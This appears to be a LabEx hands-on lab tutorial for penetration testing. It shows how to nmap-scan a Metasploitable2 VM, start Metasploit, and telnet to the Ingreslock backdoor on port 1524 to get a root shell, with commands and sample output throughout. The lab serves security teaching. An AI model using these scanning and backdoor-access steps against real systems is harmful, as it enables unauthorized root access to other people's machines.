Attacking the Ingreslock Backdoor Vulnerability

Introduction

In this lab, you will learn how to exploit the Ingreslock service vulnerability to gain root access to a target machine. The lab environment is based on the Kali and Metasploitable2 virtual machines provided by LabEx. The goal of this lab is to understand the Ingreslock vulnerability, perform a penetration scan using Nmap, and ultimately gain root access to the Metasploitable2 machine through the exploitation of the Ingreslock backdoor.

Skills Graph

Understanding the Ingreslock Vulnerability and Set up Environment

The Ingreslock vulnerability is an old but still relevant security flaw related to the Ingres database management system (DBMS). The TCP port 1524 is often used by attackers as a backdoor port for maintaining access to compromised systems.

In this step, you will learn about the Ingreslock vulnerability and its implications.

The Ingreslock vulnerability stems from the fact that the TCP port 1524 was commonly used as a backdoor listening port by attackers after successfully compromising a system. The simplicity of exploiting this vulnerability lies in the ability to gain root-level access to the target machine by simply connecting to the open port.

While this vulnerability is considered ancient, it is still present in some legacy systems, making it worth understanding and exploring in a controlled environment.

1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:

sudo virsh start Metasploitable2

2. Test the connectivity to the target machine by pinging it:

ping 192.168.122.102

Press Ctrl+C to stop the ping.

3. Launch the Kali Linux container and enter the bash environment by running:

docker run -ti --network host b5b709a49cd5 bash

4. Inside the Kali container, test the network connection to the target machine:

ping 192.168.122.102

Press Ctrl+C to stop the ping.

Performing a Penetration Scan

In this step, you will perform a penetration scan on the Metasploitable2 target machine using Nmap to identify open ports and services running on the target.

1. Start the Metasploitable2 virtual machine and ensure it is running.
2. Launch the Kali container and enter the bash shell.
3. Inside the Kali container, run the following command to perform a comprehensive scan on the target machine:

nmap -sV -T4 target-ip-address

The -sV option instructs Nmap to probe open ports to determine service/version information, while -T4 sets the timing template to an aggressive level (higher values from 0 to 5 increase the aggressiveness).

Start the PostgreSQL service and initialize the Metasploit database:

cd ~
service postgresql start
msfdb init

Launch the Metasploit console:

msfconsole

Perform a comprehensive scan on the target machine:

nmap -sV -T4 192.168.122.102

Here's an example of the output you might see:

[*] exec: nmap -sV -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-24 20:47 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0037s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login
514/tcp  open  shell?

...

This series of commands starts the PostgreSQL service, initializes the Metasploit database, launches the Metasploit console, and then performs a comprehensive scan on the target machine using Nmap.

Press Ctrl+D to quit the Metasploit console then start the inspection

Exploiting the Ingreslock Backdoor

In this step, you will exploit the Ingreslock backdoor vulnerability to gain root access to the Metasploitable2 target machine.

1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:

cd ~
msfconsole

2. Install the telnet package in the Metasploit console:

apt-key del ED444FF07D8D0BF6 && apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6 && apt update && apt install telnet

3. Use the telnet command to connect to the Ingreslock backdoor port on the target machine:

telnet 192.168.122.102 1524

If the connection is successful, you should gain root access to the target machine.

4. Now, you need to verify that the exploitation of the Ingreslock backdoor was successful by checking the IP address, hostname, and current user on the compromised machine. After connecting to the target machine via the Ingreslock backdoor, run the following commands:

Check the IP address of the compromised machine:

ifconfig

Check the hostname of the compromised machine:

hostname

Check the current user on the compromised machine:

whoami

If the exploitation was successful, you should see the IP address, hostname, and the current user as root on the target machine.

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, you learned about the Ingreslock vulnerability, which allowed attackers to gain root access to compromised systems by connecting to the TCP port 1524. You performed a penetration scan using Nmap to identify open ports and services on the target machine. After detecting the Ingreslock backdoor port, you exploited the vulnerability using the telnet command to gain root access. Finally, you verified the successful exploitation by checking the IP address, hostname, and current user on the compromised machine. This lab provided hands-on experience in understanding and exploiting a real-world vulnerability, emphasizing the importance of security patching and hardening systems against such backdoors.